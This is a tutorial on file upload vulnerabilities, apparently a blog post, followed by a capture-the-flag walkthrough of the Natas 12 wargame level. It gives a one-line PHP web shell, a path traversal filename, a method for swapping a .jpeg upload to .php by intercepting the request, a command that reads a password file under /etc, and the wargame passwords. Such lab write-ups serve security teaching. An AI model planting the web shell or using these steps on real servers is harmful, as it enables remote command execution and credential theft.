Various web applications allow users to upload files (eg images, music files etc). The uploaded files can initiate momentous risk if not handled in a secure way. Depending on how the file is processed and where it is stored the impact of the file upload vulnerability may vary.
There are two types forms of complications here. The first form is due to the metadata (file name and path). This may replace important files. For example, the attacker can upload a file named index.html in the root folder by upload a malicious file and its filename might look like this "../../../index.html". So you must validate the metadata immensely carefully before you are going to use it. The other form of complication is due to the content in the file.
- The attacker might get a web shell.
- Make a phishing page on the website.
- Make a permanent XSS on the website.
- Uploaded sensitive content might be reachable by unintended people.
The severity is very high, an intended code can be executed in the server context or on the client-side. The tendency of detection for the attacker is so high. The prevalence is common. This makes the severity of this vulnerability very high.
Make a PHP file to test the vulnerability locally in your system with the code mentioned here.
shell.php
<?php
echo system($_GET["cmd"]);
?>NATAS 12 :
- USERNAME : natas12
- PASSWORD : EDXp0pS26wLKHZy1rDBPUZk0RKfLGIR3
You can see that we can upload a file here. Let's try to upload a file so that we can get a shell on the website.
Make the shell.php file. We can pass the commands through the URL.
Now let's upload the PHP file. But during the upload, we should change the .jpeg format to .php by intercepting the request.
Once you open the link generated by the site, we can start exploiting by giving the commands we desired. Once we get the shell we can do various things.
Let's try to find the files present in the directory where the image is uploaded by giving cmd=ls
we can see various files present in the directory on the screen (say jpg, PHP, etc.) uploaded by other users for the challenge.
The password for the next level will be in the folder /etc/natas_webpass/ where natas12 is the file containing the password.
so...
.php?cmd=cat /etc/natas_webpass/natas12
Gives the password: jmLTY0qiPZBbaKc9341cqPQZBJv7MQbY
This is a basic example of File upload vulnerability.